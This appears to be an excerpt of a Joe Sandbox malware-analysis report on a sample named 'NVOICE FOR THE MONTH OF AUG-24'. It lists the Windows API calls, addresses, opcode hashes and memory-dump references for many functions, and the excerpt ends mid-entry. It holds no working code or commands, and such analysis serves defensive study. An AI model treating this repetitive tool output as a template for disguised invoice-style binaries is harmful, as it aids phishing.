                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                          APIs
                                                          • GetParent.USER32(?), ref: 004503C8
                                                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Proc$Parent
                                                          • String ID:
                                                          • API String ID: 2351499541-0
                                                          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                          • TranslateMessage.USER32(?), ref: 00442B01
                                                          • DispatchMessageW.USER32(?), ref: 00442B0B
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchTranslate
                                                          • String ID:
                                                          • API String ID: 1795658109-0
                                                          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                          • GetCaretPos.USER32(?), ref: 004743B2
                                                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                          • GetForegroundWindow.USER32 ref: 004743EE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                          APIs
                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                          • _wcslen.LIBCMT ref: 00449519
                                                          • _wcslen.LIBCMT ref: 00449526
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend_wcslen$_wcspbrk
                                                          • String ID:
                                                          • API String ID: 2886238975-0
                                                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __setmode$DebugOutputString_fprintf
                                                          • String ID:
                                                          • API String ID: 1792727568-0
                                                          • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                          • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                          APIs
                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                          APIs
                                                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                          • String ID: cdecl
                                                          • API String ID: 3850814276-3896280584
                                                          • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                          • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                          APIs
                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                          • _memmove.LIBCMT ref: 0046D475
                                                          • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 2502553879-0
                                                          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                          APIs
                                                          • SendMessageW.USER32 ref: 00448C69
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow
                                                          • String ID:
                                                          • API String ID: 312131281-0
                                                          • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                          • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                          • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                          • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                          APIs
                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastacceptselect
                                                          • String ID:
                                                          • API String ID: 385091864-0
                                                          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                          • GetStockObject.GDI32(00000011), ref: 00430258
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                          • String ID:
                                                          • API String ID: 1358664141-0
                                                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 2880819207-0
                                                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 0043392E
                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                          • __wsplitpath.LIBCMT ref: 00433950
                                                          • __wcsicoll.LIBCMT ref: 00433974
                                                          • __wcsicoll.LIBCMT ref: 0043398A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
